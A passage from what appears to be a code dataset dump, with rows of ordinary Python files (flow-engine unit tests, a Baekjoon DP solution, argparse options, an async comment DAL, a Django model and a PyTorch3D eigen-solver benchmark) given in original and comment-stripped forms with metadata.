self.assertEqual(2, len(flow.steps))
self.assertEqual(flow.step_return_values[0], flow.step_return_values[1][0])
def test_nested_flow_options(self, mock_class):
flow_config = FlowConfig(
{
"description": "Run a flow with task options",
"steps": {
1: {"flow": "nested_flow", "options": {"pass_name": {"foo": "bar"}}}
},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual("bar", flow.steps[0].options["pass_name__foo"])
def test_nested_flow_2(self, mock_class):
""" Flows can run inside other flows and call other flows """
flow_config = FlowConfig(
{
"description": "Run a task and a flow",
"steps": {1: {"task": "pass_name"}, 2: {"flow": "nested_flow_2"}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual(2, len(flow.steps))
self.assertEqual(flow.step_return_values[0], flow.step_return_values[1][0])
self.assertEqual(flow.step_return_values[0], flow.step_return_values[1][1][0])
def test_check_infinite_flows(self, mock_class):
self.project_config.config["flows"] = {
"nested_flow": {
"description": "A flow that runs inside another flow",
"steps": {1: {"flow": "nested_flow"}},
}
}
flow_config = FlowConfig({"steps": {1: {"flow": "nested_flow"}}})
with self.assertRaises(FlowInfiniteLoopError):
BaseFlow(self.project_config, flow_config, self.org_config)
def test_rejects_old_syntax(self, mock_class):
flow_config = FlowConfig({"tasks": {1: {"task": "pass_name"}}})
flow = BaseFlow(self.project_config, flow_config, self.org_config)
with self.assertRaises(FlowConfigError):
flow._get_steps_ordered()
def test_rejects_flow_and_task_in_same_step(self, mock_class):
flow_config = FlowConfig(
{"steps": {1: {"task": "pass_name", "flow": "nested_flow"}}}
)
with self.assertRaises(FlowConfigError):
BaseFlow(self.project_config, flow_config, self.org_config)
def test_call__not_prepped(self, mock_class):
flow_config = FlowConfig({})
flow = BaseFlow(self.project_config, flow_config, self.org_config, prep=False)
with self.assertRaises(FlowNotReadyError):
flow()
| """ Tests for the Flow engine """
import unittest
import logging
import mock
from collections import Callable
from cumulusci.core.flows import BaseFlow
from cumulusci.core.tasks import BaseTask
from cumulusci.core.config import FlowConfig
from cumulusci.core.config import OrgConfig
from cumulusci.core.exceptions import FlowConfigError
from cumulusci.core.exceptions import FlowInfiniteLoopError
from cumulusci.core.exceptions import FlowNotReadyError
from cumulusci.core.exceptions import TaskNotFoundError
from cumulusci.core.tests.utils import MockLoggingHandler
from cumulusci.tests.util import create_project_config
import cumulusci.core
ORG_ID = "00D000000000001"
class _TaskReturnsStuff(BaseTask):
def _run_task(self):
self.return_values = {"name": "supername"}
class _TaskResponseName(BaseTask):
task_options = {"response": {"description": "the response to print"}}
def _run_task(self):
return self.options["response"]
class _TaskRaisesException(BaseTask):
task_options = {
"exception": {"description": "The exception to raise"},
"message": {"description": "The exception message"},
}
def _run_task(self):
raise self.options["exception"](self.options["message"])
class _SfdcTask(BaseTask):
salesforce_task = True
def _run_task(self):
return -1
@mock.patch("cumulusci.core.flows.BaseFlow._init_org")
class TestBaseFlow(unittest.TestCase):
""" Tests the expectations of a BaseFlow caller """
@classmethod
def setUpClass(cls):
super(TestBaseFlow, cls).setUpClass()
logger = logging.getLogger(cumulusci.core.__name__)
logger.setLevel(logging.DEBUG)
cls._flow_log_handler = MockLoggingHandler(logging.DEBUG)
logger.addHandler(cls._flow_log_handler)
def setUp(self):
self.project_config = create_project_config("TestOwner", "TestRepo")
self.project_config.config["tasks"] = {
"pass_name": {
"description": "Pass the name",
"class_path": "cumulusci.core.tests.test_flows._TaskReturnsStuff",
},
"name_response": {
"description": "Pass the name",
"class_path": "cumulusci.core.tests.test_flows._TaskResponseName",
},
"raise_exception": {
"description": "Raises an exception",
"class_path": "cumulusci.core.tests.test_flows._TaskRaisesException",
"options": {
"exception": Exception,
"message": "Test raised exception as expected",
},
},
"sfdc_task": {
"description": "An sfdc task",
"class_path": "cumulusci.core.tests.test_flows._SfdcTask",
},
}
self.project_config.config["flows"] = {
"nested_flow": {
"description": "A flow that runs inside another flow",
"steps": {1: {"task": "pass_name"}},
},
"nested_flow_2": {
"description": "A flow that runs inside another flow, and calls another flow",
"steps": {1: {"task": "pass_name"}, 2: {"flow": "nested_flow"}},
},
}
self.org_config = OrgConfig(
{"username": "<EMAIL>", "org_id": ORG_ID}, "test"
)
self._flow_log_handler.reset()
self.flow_log = self._flow_log_handler.messages
def test_init(self, mock_class):
""" BaseFlow initializes and offers a logger """
flow_config = FlowConfig({})
mock_class.return_value = None
flow = BaseFlow(self.project_config, flow_config, self.org_config)
self.assertEqual(hasattr(flow, "logger"), True)
def test_is_callable(self, mock_class):
""" BaseFlow exposes itself as a callable for use """
flow_config = FlowConfig({})
flow = BaseFlow(self.project_config, flow_config, self.org_config)
self.assertIsInstance(flow, Callable)
def test_pass_around_values(self, mock_class):
""" A flow's options reach into return values from other tasks. """
mock_class.return_value = None
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {
1: {"task": "pass_name"},
2: {
"task": "name_response",
"options": {"response": "^^pass_name.name"},
},
},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
# run the flow
flow()
# the flow results for the second task should be 'name'
self.assertEqual("supername", flow.step_results[1])
def test_task_options(self, mock_class):
""" A flow can accept task options and pass them to the task. """
mock_class.return_value = None
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "name_response", "options": {"response": "foo"}}},
}
)
flow = BaseFlow(
self.project_config,
flow_config,
self.org_config,
options={"name_response__response": "bar"},
)
# run the flow
flow()
# the flow results for the first task should be 'bar'
self.assertEqual("bar", flow.step_results[0])
def test_skip_kwarg(self, mock_class):
""" A flow can receive during init a list of tasks to skip """
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {
1: {"task": "pass_name"},
2: {
"task": "name_response",
"options": {"response": "^^pass_name.name"},
},
},
}
)
flow = BaseFlow(
self.project_config, flow_config, self.org_config, skip=["name_response"]
)
# run the flow
flow()
# the number of tasks in the flow should be 1 instead of 2
self.assertEqual(1, len(flow.step_results))
def test_skip_task_value_none(self, mock_class):
""" A flow skips any tasks whose name is None to allow override via yaml """
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "pass_name"}, 2: {"task": "None"}},
}
)
flow = BaseFlow(
self.project_config, flow_config, self.org_config, skip=["name_response"]
)
# run the flow
flow()
# the number of tasks in the flow should be 1 instead of 2
self.assertEqual(1, len(flow.step_results))
def test_find_step_by_name_no_steps(self, mock_class):
""" Running a flow with no steps throws an error """
# instantiate a flow with two tasks
flow_config = FlowConfig({"description": "Run two tasks"})
flow = BaseFlow(self.project_config, flow_config, self.org_config)
self.assertIsNone(flow._find_step_by_name("task"))
with self.assertRaises(FlowConfigError):
flow()
def test_find_step_by_name_not_first(self, mock_class):
""" The _find_step_by_name method skips tasks that don't exist """
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {
1: {"task": "pass_name"},
2: {
"task": "name_response",
"options": {"response": "^^pass_name.name"},
},
},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
task = flow._find_step_by_name("name_response")
self.assertEqual(
"cumulusci.core.tests.test_flows._TaskResponseName",
task.task_config.class_path,
)
def test_find_step_by_name__flow(self, mock_class):
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {
1: {"flow": "nested_flow"},
2: {
"task": "name_response",
"options": {
"response": "^^nested_flow.pass_name.name",
"from_flow": "^^nested_flow.name",
},
},
},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
step = flow._find_step_by_name("nested_flow")
self.assertIsInstance(step, BaseFlow)
def test_render_task_config_empty_value(self, mock_class):
""" The _render_task_config method skips option values of None """
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run a tasks",
"steps": {1: {"task": "name_response", "options": {"response": None}}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
task = flow._find_step_by_name("name_response")
config = flow._render_task_config(task)
self.assertEqual(["Options:"], config)
def test_task_raises_exception_fail(self, mock_class):
""" A flow aborts when a task raises an exception """
flow_config = FlowConfig(
{"description": "Run a task", "steps": {1: {"task": "raise_exception"}}}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
self.assertRaises(Exception, flow)
def test_task_raises_exception_ignore(self, mock_class):
""" A flow continues when a task configured with ignore_failure raises an exception """
flow_config = FlowConfig(
{
"description": "Run a task",
"steps": {
1: {"task": "raise_exception", "ignore_failure": True},
2: {"task": "pass_name"},
},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual(2, len(flow.steps))
def test_call_no_tasks(self, mock_class):
""" A flow with no tasks will have no responses. """
flow_config = FlowConfig({"description": "Run no tasks", "steps": {}})
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual([], flow.step_return_values)
self.assertEqual([], flow.steps)
def test_call_one_task(self, mock_class):
""" A flow with one task will execute the task """
flow_config = FlowConfig(
{"description": "Run one task", "steps": {1: {"task": "pass_name"}}}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertTrue(
any("Flow Description: Run one task" in s for s in self.flow_log["info"])
)
self.assertEqual([{"name": "supername"}], flow.step_return_values)
self.assertEqual(1, len(flow.steps))
def test_call_many_tasks(self, mock_class):
""" A flow with many tasks will dispatch each task """
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "pass_name"}, 2: {"task": "pass_name"}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual(
[{"name": "supername"}, {"name": "supername"}], flow.step_return_values
)
self.assertEqual(2, len(flow.steps))
def test_call_task_not_found(self, mock_class):
""" A flow with reference to a task that doesn't exist in the
project will throw a TaskNotFoundError """
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "pass_name"}, 2: {"task": "do_delightulthings"}},
}
)
with self.assertRaises(TaskNotFoundError):
flow = BaseFlow(self.project_config, flow_config, self.org_config)
def test_flow_prints_org_id(self, mock_class):
""" A flow with an org prints the org ID """
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "pass_name"}, 2: {"task": "pass_name"}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
org_id_logs = [s for s in self.flow_log["info"] if ORG_ID in s]
self.assertEqual(1, len(org_id_logs))
def test_flow_no_org_no_org_id(self, mock_class):
""" A flow without an org does not print the org ID """
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "pass_name"}, 2: {"task": "pass_name"}},
}
)
flow = BaseFlow(self.project_config, flow_config, None)
flow()
self.assertFalse(any(ORG_ID in s for s in self.flow_log["info"]))
def test_flow_prints_org_id_once_only(self, mock_class):
""" A flow with sf tasks prints the org ID only once."""
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "sfdc_task"}, 2: {"task": "sfdc_task"}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
org_id_logs = [s for s in self.flow_log["info"] if ORG_ID in s]
self.assertEqual(1, len(org_id_logs))
def test_nested_flow(self, mock_class):
""" Flows can run inside other flows """
flow_config = FlowConfig(
{
"description": "Run a task and a flow",
"steps": {1: {"task": "pass_name"}, 2: {"flow": "nested_flow"}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual(2, len(flow.steps))
self.assertEqual(flow.step_return_values[0], flow.step_return_values[1][0])
def test_nested_flow_options(self, mock_class):
flow_config = FlowConfig(
{
"description": "Run a flow with task options",
"steps": {
1: {"flow": "nested_flow", "options": {"pass_name": {"foo": "bar"}}}
},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual("bar", flow.steps[0].options["pass_name__foo"])
def test_nested_flow_2(self, mock_class):
""" Flows can run inside other flows and call other flows """
flow_config = FlowConfig(
{
"description": "Run a task and a flow",
"steps": {1: {"task": "pass_name"}, 2: {"flow": "nested_flow_2"}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual(2, len(flow.steps))
self.assertEqual(flow.step_return_values[0], flow.step_return_values[1][0])
self.assertEqual(flow.step_return_values[0], flow.step_return_values[1][1][0])
def test_check_infinite_flows(self, mock_class):
self.project_config.config["flows"] = {
"nested_flow": {
"description": "A flow that runs inside another flow",
"steps": {1: {"flow": "nested_flow"}},
}
}
flow_config = FlowConfig({"steps": {1: {"flow": "nested_flow"}}})
with self.assertRaises(FlowInfiniteLoopError):
BaseFlow(self.project_config, flow_config, self.org_config)
def test_rejects_old_syntax(self, mock_class):
flow_config = FlowConfig({"tasks": {1: {"task": "pass_name"}}})
flow = BaseFlow(self.project_config, flow_config, self.org_config)
with self.assertRaises(FlowConfigError):
flow._get_steps_ordered()
def test_rejects_flow_and_task_in_same_step(self, mock_class):
flow_config = FlowConfig(
{"steps": {1: {"task": "pass_name", "flow": "nested_flow"}}}
)
with self.assertRaises(FlowConfigError):
BaseFlow(self.project_config, flow_config, self.org_config)
def test_call__not_prepped(self, mock_class):
flow_config = FlowConfig({})
flow = BaseFlow(self.project_config, flow_config, self.org_config, prep=False)
with self.assertRaises(FlowNotReadyError):
flow() | en | 0.910759 | Tests for the Flow engine Tests the expectations of a BaseFlow caller BaseFlow initializes and offers a logger BaseFlow exposes itself as a callable for use A flow's options reach into return values from other tasks. # instantiate a flow with two tasks # run the flow # the flow results for the second task should be 'name' A flow can accept task options and pass them to the task. # instantiate a flow with two tasks # run the flow # the flow results for the first task should be 'bar' A flow can receive during init a list of tasks to skip # instantiate a flow with two tasks # run the flow # the number of tasks in the flow should be 1 instead of 2 A flow skips any tasks whose name is None to allow override via yaml # instantiate a flow with two tasks # run the flow # the number of tasks in the flow should be 1 instead of 2 Running a flow with no steps throws an error # instantiate a flow with two tasks The _find_step_by_name method skips tasks that don't exist # instantiate a flow with two tasks The _render_task_config method skips option values of None # instantiate a flow with two tasks A flow aborts when a task raises an exception A flow continues when a task configured with ignore_failure raises an exception A flow with no tasks will have no responses. A flow with one task will execute the task A flow with many tasks will dispatch each task A flow with reference to a task that doesn't exist in the project will throw a TaskNotFoundError A flow with an org prints the org ID A flow without an org does not print the org ID A flow with sf tasks prints the org ID only once. Flows can run inside other flows Flows can run inside other flows and call other flows | 2.253898 | 2 |
baekjoon/python/guitarlist_1495.py | yskang/AlgorithmPractice | 0 | 6632472 | # Title: 기타리스트
# Link: https://www.acmicpc.net/problem/1495
import sys
sys.setrecursionlimit(10 ** 6)
read_list_int = lambda: list(map(int, sys.stdin.readline().strip().split(' ')))
def solution(n: int, s: int, m: int, v: list):
dp = [{} for _ in range(n+1)]
dp[0][s] = True
for i in range(0, n):
for x in dp[i].keys():
if x-v[i] >= 0:
dp[i+1][x-v[i]] = True
if x+v[i] <= m:
dp[i+1][x+v[i]] = True
return sorted(dp[n].keys(), reverse=True)[0] if len(dp[n]) > 0 else -1
def main():
n, s, m = read_list_int()
v = read_list_int()
print(solution(n, s, m, v))
if __name__ == '__main__':
main() | # Title: 기타리스트
# Link: https://www.acmicpc.net/problem/1495
import sys
sys.setrecursionlimit(10 ** 6)
read_list_int = lambda: list(map(int, sys.stdin.readline().strip().split(' ')))
def solution(n: int, s: int, m: int, v: list):
dp = [{} for _ in range(n+1)]
dp[0][s] = True
for i in range(0, n):
for x in dp[i].keys():
if x-v[i] >= 0:
dp[i+1][x-v[i]] = True
if x+v[i] <= m:
dp[i+1][x+v[i]] = True
return sorted(dp[n].keys(), reverse=True)[0] if len(dp[n]) > 0 else -1
def main():
n, s, m = read_list_int()
v = read_list_int()
print(solution(n, s, m, v))
if __name__ == '__main__':
main() | en | 0.49608 | # Title: 기타리스트 # Link: https://www.acmicpc.net/problem/1495 | 2.765428 | 3 |
opts.py | xuehuiping/Global-Encoding | 0 | 6632473 | <filename>opts.py
def model_opts(parser):
parser.add_argument('-config', default='lcsts.yaml', type=str,
help="config file")
parser.add_argument('-gpus', default=[], nargs='+', type=int,
help="Use CUDA on the listed devices.")
parser.add_argument('-restore', default='', type=str,
help="restore checkpoint")
parser.add_argument('-seed', type=int, default=1234,
help="Random seed")
parser.add_argument('-model', default='seq2seq', type=str,
help="Model selection")
parser.add_argument('-mode', default='train', type=str,
help="Mode selection")
parser.add_argument('-module', default='seq2seq', type=str,
help="Module selection")
parser.add_argument('-log', default='', type=str,
help="log directory")
parser.add_argument('-num_processes', type=int, default=4,
help="number of processes")
parser.add_argument('-refF', default='', type=str,
help="reference file")
parser.add_argument('-unk', action='store_true', help='replace unk')
parser.add_argument('-char', action='store_true', help='char level decoding')
parser.add_argument('-length_norm', action='store_true', help='replace unk')
parser.add_argument('-pool_size', type=int, default=0, help="pool size of maxout layer")
parser.add_argument('-scale', type=float, default=1, help="proportion of the training set")
parser.add_argument('-max_split', type=int, default=0, help="max generator time steps for memory efficiency")
parser.add_argument('-split_num', type=int, default=0, help="split number for splitres")
parser.add_argument('-pretrain', default='', type=str, help="load pretrain encoder")
def convert_to_config(opt, config):
opt = vars(opt)
for key in opt:
if key not in config:
config[key] = opt[key]
| <filename>opts.py
def model_opts(parser):
parser.add_argument('-config', default='lcsts.yaml', type=str,
help="config file")
parser.add_argument('-gpus', default=[], nargs='+', type=int,
help="Use CUDA on the listed devices.")
parser.add_argument('-restore', default='', type=str,
help="restore checkpoint")
parser.add_argument('-seed', type=int, default=1234,
help="Random seed")
parser.add_argument('-model', default='seq2seq', type=str,
help="Model selection")
parser.add_argument('-mode', default='train', type=str,
help="Mode selection")
parser.add_argument('-module', default='seq2seq', type=str,
help="Module selection")
parser.add_argument('-log', default='', type=str,
help="log directory")
parser.add_argument('-num_processes', type=int, default=4,
help="number of processes")
parser.add_argument('-refF', default='', type=str,
help="reference file")
parser.add_argument('-unk', action='store_true', help='replace unk')
parser.add_argument('-char', action='store_true', help='char level decoding')
parser.add_argument('-length_norm', action='store_true', help='replace unk')
parser.add_argument('-pool_size', type=int, default=0, help="pool size of maxout layer")
parser.add_argument('-scale', type=float, default=1, help="proportion of the training set")
parser.add_argument('-max_split', type=int, default=0, help="max generator time steps for memory efficiency")
parser.add_argument('-split_num', type=int, default=0, help="split number for splitres")
parser.add_argument('-pretrain', default='', type=str, help="load pretrain encoder")
def convert_to_config(opt, config):
opt = vars(opt)
for key in opt:
if key not in config:
config[key] = opt[key]
| none | 1 | 2.120573 | 2 |
|
task/sseg/module/backbone/__init__.py | ZHKKKe/PixelSSL | 223 | 6632474 | """
This file is adapted from https://github.com/jfzhang95/pytorch-deeplab-xception
"""
from . import resnet
def build_backbone(backbone, output_stride, BatchNorm, pretrained_backbone_url):
if backbone in ['resnet50']:
return resnet.ResNet50(output_stride, BatchNorm, pretrained_backbone_url)
elif backbone in ['resnet101', 'resnet101-coco']:
return resnet.ResNet101(output_stride, BatchNorm, pretrained_backbone_url)
else:
raise NotImplementedError
| """
This file is adapted from https://github.com/jfzhang95/pytorch-deeplab-xception
"""
from . import resnet
def build_backbone(backbone, output_stride, BatchNorm, pretrained_backbone_url):
if backbone in ['resnet50']:
return resnet.ResNet50(output_stride, BatchNorm, pretrained_backbone_url)
elif backbone in ['resnet101', 'resnet101-coco']:
return resnet.ResNet101(output_stride, BatchNorm, pretrained_backbone_url)
else:
raise NotImplementedError
| en | 0.875327 | This file is adapted from https://github.com/jfzhang95/pytorch-deeplab-xception | 2.330137 | 2 |
webapi/db/dals/comment_dal.py | xqhgit/fastapi-vue-blog | 3 | 6632475 | # -*-coding:utf-8 -*-
from typing import List, Optional
from sqlalchemy import func, desc, delete, update
from sqlalchemy.future import select
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy.orm import selectinload, joinedload
from webapi.db.models import Comment
from webapi.db.schemas.comment import CommentCreate, CommentInUpdate
class CommentDAL:
def __init__(self, db_session: AsyncSession):
self.db_session = db_session
async def create(self, obj_in: CommentCreate):
data = obj_in.dict(exclude_none=True)
db_obj = Comment(**data)
self.db_session.add(db_obj)
await self.db_session.flush()
return db_obj
async def delete(self, *, db_obj: Comment):
await self.db_session.execute(update(Comment).where(Comment.replied_id == db_obj.id).values(replied_id=None))
await self.db_session.execute(delete(Comment).where(Comment.id == db_obj.id))
async def update(self, db_obj: Comment, obj_in: CommentInUpdate):
update_data = obj_in.dict(exclude_none=True)
for field in update_data:
setattr(db_obj, field, update_data[field])
self.db_session.add(db_obj)
await self.db_session.flush()
return db_obj
async def get_by_id(self, record_id: int, *, reviewed=None):
stmt = select(Comment).where(Comment.id == record_id)
if reviewed is not None:
stmt = stmt.where(Comment.reviewed == reviewed)
q = await self.db_session.execute(stmt)
result = q.scalars().all()
if result:
return result[0]
else:
return None
async def count(self, *, reviewed=None):
stmt = select(func.count(Comment.id).label('total'))
if reviewed is not None:
stmt = stmt.where(Comment.reviewed == reviewed)
q = await self.db_session.execute(stmt)
return q.one()['total']
async def get_limit(self, *, page, limit, reviewed=None):
offset = limit * (page - 1)
stmt = select(Comment).options(selectinload(Comment.post))
if reviewed is not None:
stmt = stmt.where(Comment.reviewed == reviewed)
stmt = stmt.order_by(desc(Comment.timestamp)).offset(offset).limit(limit)
q = await self.db_session.execute(stmt)
return q.scalars().all()
| # -*-coding:utf-8 -*-
from typing import List, Optional
from sqlalchemy import func, desc, delete, update
from sqlalchemy.future import select
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy.orm import selectinload, joinedload
from webapi.db.models import Comment
from webapi.db.schemas.comment import CommentCreate, CommentInUpdate
class CommentDAL:
def __init__(self, db_session: AsyncSession):
self.db_session = db_session
async def create(self, obj_in: CommentCreate):
data = obj_in.dict(exclude_none=True)
db_obj = Comment(**data)
self.db_session.add(db_obj)
await self.db_session.flush()
return db_obj
async def delete(self, *, db_obj: Comment):
await self.db_session.execute(update(Comment).where(Comment.replied_id == db_obj.id).values(replied_id=None))
await self.db_session.execute(delete(Comment).where(Comment.id == db_obj.id))
async def update(self, db_obj: Comment, obj_in: CommentInUpdate):
update_data = obj_in.dict(exclude_none=True)
for field in update_data:
setattr(db_obj, field, update_data[field])
self.db_session.add(db_obj)
await self.db_session.flush()
return db_obj
async def get_by_id(self, record_id: int, *, reviewed=None):
stmt = select(Comment).where(Comment.id == record_id)
if reviewed is not None:
stmt = stmt.where(Comment.reviewed == reviewed)
q = await self.db_session.execute(stmt)
result = q.scalars().all()
if result:
return result[0]
else:
return None
async def count(self, *, reviewed=None):
stmt = select(func.count(Comment.id).label('total'))
if reviewed is not None:
stmt = stmt.where(Comment.reviewed == reviewed)
q = await self.db_session.execute(stmt)
return q.one()['total']
async def get_limit(self, *, page, limit, reviewed=None):
offset = limit * (page - 1)
stmt = select(Comment).options(selectinload(Comment.post))
if reviewed is not None:
stmt = stmt.where(Comment.reviewed == reviewed)
stmt = stmt.order_by(desc(Comment.timestamp)).offset(offset).limit(limit)
q = await self.db_session.execute(stmt)
return q.scalars().all()
| en | 0.652073 | # -*-coding:utf-8 -*- | 2.303869 | 2 |
handlers/__init__.py | Args-Engine/rb-distributed-helloworld | 0 | 6632476 | from .handshake_handler import HandshakeHandler
from .pingpong_handler import PingPongHandler
handler_types = {"Handshake": HandshakeHandler.handle,
"Ping": PingPongHandler.handle}
| from .handshake_handler import HandshakeHandler
from .pingpong_handler import PingPongHandler
handler_types = {"Handshake": HandshakeHandler.handle,
"Ping": PingPongHandler.handle}
| none | 1 | 1.559551 | 2 |
|
src/sage/combinat/integer_lists/__init__.py | defeo/sage | 3 | 6632477 | <gh_stars>1-10
from __future__ import absolute_import
from .base import IntegerListsBackend, Envelope
from .lists import IntegerLists
from .invlex import IntegerListsLex
from sage.structure.sage_object import register_unpickle_override
register_unpickle_override('sage.combinat.integer_list', 'IntegerListsLex', IntegerListsLex)
| from __future__ import absolute_import
from .base import IntegerListsBackend, Envelope
from .lists import IntegerLists
from .invlex import IntegerListsLex
from sage.structure.sage_object import register_unpickle_override
register_unpickle_override('sage.combinat.integer_list', 'IntegerListsLex', IntegerListsLex) | none | 1 | 1.178677 | 1 |
|
src/core/models.py | IssTech/IssAssist | 0 | 6632478 | <filename>src/core/models.py
# Django Core Modules
from django.db import models
from django.conf import settings
# Apps specific
class CoreConfig(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, default=1, on_delete=models.CASCADE)
hostname = models.CharField(max_length = 128, default = 'hostname', blank=False)
fqdn = models.CharField(max_length = 256, default = 'hostname.company.com', blank = True)
ipv4_address = models.CharField(max_length = 128, default = '1.2.3.4', blank=False)
#isssys_agent = models.ForeignKey(IssSys, default=None, blank=True, null=True, on_delete=models.CASCADE)
def __str__(self):
return(self.fqdn)
| <filename>src/core/models.py
# Django Core Modules
from django.db import models
from django.conf import settings
# Apps specific
class CoreConfig(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, default=1, on_delete=models.CASCADE)
hostname = models.CharField(max_length = 128, default = 'hostname', blank=False)
fqdn = models.CharField(max_length = 256, default = 'hostname.company.com', blank = True)
ipv4_address = models.CharField(max_length = 128, default = '1.2.3.4', blank=False)
#isssys_agent = models.ForeignKey(IssSys, default=None, blank=True, null=True, on_delete=models.CASCADE)
def __str__(self):
return(self.fqdn)
| en | 0.227467 | # Django Core Modules # Apps specific #isssys_agent = models.ForeignKey(IssSys, default=None, blank=True, null=True, on_delete=models.CASCADE) | 2.117107 | 2 |
tests/benchmarks/bm_symeig3x3.py | janEbert/pytorch3d | 1 | 6632479 | <gh_stars>1-10
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from itertools import product
from typing import Any, Callable
import torch
from common_testing import get_random_cuda_device
from fvcore.common.benchmark import benchmark
from pytorch3d.common.workaround import symeig3x3
from test_symeig3x3 import TestSymEig3x3
torch.set_num_threads(1)
CUDA_DEVICE = get_random_cuda_device()
def create_traced_func(func, device, batch_size):
traced_func = torch.jit.trace(
func, (TestSymEig3x3.create_random_sym3x3(device, batch_size),)
)
return traced_func
FUNC_NAME_TO_FUNC = {
"sym3x3eig": (lambda inputs: symeig3x3(inputs, eigenvectors=True)),
"sym3x3eig_traced_cuda": create_traced_func(
(lambda inputs: symeig3x3(inputs, eigenvectors=True)), CUDA_DEVICE, 1024
),
"torch_symeig": (lambda inputs: torch.symeig(inputs, eigenvectors=True)),
"torch_linalg_eigh": (lambda inputs: torch.linalg.eigh(inputs)),
"torch_pca_lowrank": (
lambda inputs: torch.pca_lowrank(inputs, center=False, niter=1)
),
"sym3x3eig_no_vecs": (lambda inputs: symeig3x3(inputs, eigenvectors=False)),
"torch_symeig_no_vecs": (lambda inputs: torch.symeig(inputs, eigenvectors=False)),
"torch_linalg_eigvalsh_no_vecs": (lambda inputs: torch.linalg.eigvalsh(inputs)),
}
def test_symeig3x3(func_name, batch_size, device) -> Callable[[], Any]:
func = FUNC_NAME_TO_FUNC[func_name]
inputs = TestSymEig3x3.create_random_sym3x3(device, batch_size)
torch.cuda.synchronize()
def symeig3x3():
func(inputs)
torch.cuda.synchronize()
return symeig3x3
def bm_symeig3x3() -> None:
devices = ["cpu"]
if torch.cuda.is_available():
devices.append(CUDA_DEVICE)
kwargs_list = []
func_names = FUNC_NAME_TO_FUNC.keys()
batch_sizes = [16, 128, 1024, 8192, 65536, 1048576]
for func_name, batch_size, device in product(func_names, batch_sizes, devices):
# Run CUDA-only implementations only on GPU
if "cuda" in func_name and not device.startswith("cuda"):
continue
# Torch built-ins are quite slow on larger batches
if "torch" in func_name and batch_size > 8192:
continue
# Avoid running CPU implementations on larger batches as well
if device == "cpu" and batch_size > 8192:
continue
kwargs_list.append(
{"func_name": func_name, "batch_size": batch_size, "device": device}
)
benchmark(
test_symeig3x3,
"SYMEIG3X3",
kwargs_list,
warmup_iters=3,
)
if __name__ == "__main__":
bm_symeig3x3()
| # Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from itertools import product
from typing import Any, Callable
import torch
from common_testing import get_random_cuda_device
from fvcore.common.benchmark import benchmark
from pytorch3d.common.workaround import symeig3x3
from test_symeig3x3 import TestSymEig3x3
torch.set_num_threads(1)
CUDA_DEVICE = get_random_cuda_device()
def create_traced_func(func, device, batch_size):
traced_func = torch.jit.trace(
func, (TestSymEig3x3.create_random_sym3x3(device, batch_size),)
)
return traced_func
FUNC_NAME_TO_FUNC = {
"sym3x3eig": (lambda inputs: symeig3x3(inputs, eigenvectors=True)),
"sym3x3eig_traced_cuda": create_traced_func(
(lambda inputs: symeig3x3(inputs, eigenvectors=True)), CUDA_DEVICE, 1024
),
"torch_symeig": (lambda inputs: torch.symeig(inputs, eigenvectors=True)),
"torch_linalg_eigh": (lambda inputs: torch.linalg.eigh(inputs)),
"torch_pca_lowrank": (
lambda inputs: torch.pca_lowrank(inputs, center=False, niter=1)
),
"sym3x3eig_no_vecs": (lambda inputs: symeig3x3(inputs, eigenvectors=False)),
"torch_symeig_no_vecs": (lambda inputs: torch.symeig(inputs, eigenvectors=False)),
"torch_linalg_eigvalsh_no_vecs": (lambda inputs: torch.linalg.eigvalsh(inputs)),
}
def test_symeig3x3(func_name, batch_size, device) -> Callable[[], Any]:
func = FUNC_NAME_TO_FUNC[func_name]
inputs = TestSymEig3x3.create_random_sym3x3(device, batch_size)
torch.cuda.synchronize()
def symeig3x3():
func(inputs)
torch.cuda.synchronize()
return symeig3x3
def bm_symeig3x3() -> None:
devices = ["cpu"]
if torch.cuda.is_available():
devices.append(CUDA_DEVICE)
kwargs_list = []
func_names = FUNC_NAME_TO_FUNC.keys()
batch_sizes = [16, 128, 1024, 8192, 65536, 1048576]
